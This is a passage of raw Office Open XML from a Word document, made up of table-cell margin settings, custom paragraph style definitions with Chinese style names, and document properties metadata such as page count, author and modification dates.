          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="seCell">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="148">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="149">
    <w:name w:val="页眉logo"/>
    <w:basedOn w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="150">
    <w:name w:val="无间隔1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="151">
    <w:name w:val="表格里项目符号"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:adjustRightInd/>
      <w:snapToGrid/>
      <w:spacing w:after="0" w:afterLines="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="152">
    <w:name w:val="修订1"/>
    <w:hidden/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="153">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线 Light" w:cs="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="154">
    <w:name w:val="正文（长这科技）"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>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4.jpe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09FEF0-E5D5-4582-A491-A7A7655405EF}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <Pages>36</Pages>
  <Words>6545</Words>
  <Characters>37311</Characters>
  <Lines>310</Lines>
  <Paragraphs>87</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>43769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2020-03-27T15:35:00Z</dcterms:created>
  <dc:creator>mengying.han</dc:creator>
  <cp:lastModifiedBy>卢占文</cp:lastModifiedBy>
  <cp:lastPrinted>2018-08-28T06:54:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T23:55:37Z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4704069FFF16590FECF513696ABDE5F6_42</vt:lpwstr>
  </property>
</Properties>
</file>